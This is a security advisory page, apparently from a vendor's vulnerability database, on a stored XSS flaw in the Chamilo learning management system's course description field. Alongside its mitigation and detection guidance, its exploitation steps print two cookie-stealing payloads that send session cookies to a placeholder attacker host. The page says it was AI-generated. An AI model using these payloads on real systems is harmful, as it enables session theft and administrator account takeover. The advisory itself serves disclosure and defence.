CVE-2025-59543: 
Chamilo vulnerability analysis and mitigation

Overview

CVE-2025-59543 is a stored cross-site scripting (XSS) vulnerability in Chamilo LMS, a widely used open-source learning management system. An attacker with a low-privileged account (e.g., a trainer) can inject malicious JavaScript into the course description field, which then executes in the browser of any user viewing the course information page, including administrators. All versions prior to 1.11.34 are affected, with the vulnerability specifically confirmed in v1.11.32. The issue was published on March 6, 2026, and patched in version 1.11.34. It carries a CVSS v3.1 base score of 9.0 (Critical) (GitHub Advisory, Red Hat CVE).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically a stored XSS variant. The root cause is insufficient sanitization of user-supplied input in the Course Management → Course Description field, allowing HTML/JavaScript to be persisted in the database and rendered unsanitized to other users. The fix in v1.11.34 includes a commit titled "Course description: Remove XSS when showing title" (PR #6662), confirming that output encoding was missing when displaying course description content. Exploitation requires only a low-privileged account (e.g., trainer role) and user interaction from a victim viewing the compromised course page (GitHub Advisory, Chamilo v1.11.34 Release).

Impact

Successful exploitation enables an attacker to execute arbitrary JavaScript in the browsers of other users, including administrators, leading to session cookie or token exfiltration and full account takeover (ATO) of higher-privileged users. This can result in privilege escalation from trainer to administrator, unauthorized access to user data, course content, and system configuration, and further compromise of the entire LMS instance. The CVSS score reflects high impacts across confidentiality, integrity, and availability due to the potential for complete administrative account compromise (GitHub Advisory).

Exploitability

No public proof-of-concept exploit code has been identified, and there is no evidence of in-the-wild exploitation at this time (Feedly). The EPSS score is approximately 0.041%, indicating a low current probability of exploitation in the wild. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, the low privilege requirement (any trainer account) and the high-value target (administrator session tokens) make this an attractive vector for insider threats or compromised low-privilege accounts.

Exploitation steps

  1. Obtain a low-privileged account: Register or compromise a trainer-level account on a vulnerable Chamilo LMS instance (version < 1.11.34).
  2. Navigate to Course Description: Log in and access Course Management → Course Description for a course the attacker has edit access to.
  3. Inject malicious JavaScript: Insert a stored XSS payload into the course description field, such as <script>document.location='https://attacker.com/steal?c='+document.cookie;</script> or a more stealthy image-based payload like <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">.
  4. Save the payload: Submit the form to persist the malicious script in the database.
  5. Wait for victim interaction: When an administrator or other privileged user views the course information page, the injected JavaScript executes in their browser context.
  6. Exfiltrate session tokens: The payload sends the victim's session cookie or authentication token to the attacker-controlled server.
  7. Perform account takeover: Use the stolen session token to authenticate as the administrator, gaining full control of the LMS instance (GitHub Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from the Chamilo server or user browsers to unexpected external domains (e.g., attacker-controlled cookie-stealing endpoints); unusual GET/POST requests containing URL-encoded cookie data to non-Chamilo domains.
  • Logs: Web server access logs showing requests to course description pages followed by unusual outbound connections; application logs recording unexpected JavaScript content saved in course description fields.
  • File System / Database: Course description fields in the database containing <script>, onerror, javascript:, or other HTML event handler attributes when inspected directly.
  • Browser/User Reports: Administrators reporting unexpected redirects or blank page loads when viewing course information pages; reports of unauthorized actions performed under administrator accounts.

Mitigation and workarounds

Chamilo has released version 1.11.34 as a security-focused patch that removes XSS from the course description display (PR #6662). All users should upgrade to Chamilo LMS v1.11.34 or later immediately (Chamilo v1.11.34 Release). As interim mitigations prior to patching: restrict course creation and description editing permissions to only fully trusted users; implement a Content Security Policy (CSP) header to limit script execution sources; and audit existing course descriptions for suspicious HTML or JavaScript content. Additionally, enforcing the HttpOnly flag on session cookies can reduce the impact of successful XSS exploitation by preventing cookie theft via JavaScript.

Community reactions

The vulnerability was reported by security researcher prakhar0x01 and disclosed via GitHub Security Advisories on March 5–6, 2026 (GitHub Advisory). The Chamilo maintainer ywarnier published the advisory and the fix was included in the v1.11.34 release, described as "mostly a security release" (Chamilo v1.11.34 Release). Brief community coverage appeared on Mastodon via @thehackerwire and was indexed by threat intelligence aggregators including ENISA EUVD and VulDB shortly after disclosure.

Additional resources


Source: This report was generated using AI

Related Chamilo vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-45140CRITICAL9.8
  • PHP logoPHP
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesSep 17, 2026
CVE-2026-39878CRITICAL9.3
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesJul 20, 2026
CVE-2026-45143CRITICAL9
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesSep 17, 2026
CVE-2026-34239HIGH7.5
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesJul 20, 2026
CVE-2026-82535MEDIUM5.3
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoNoSep 11, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management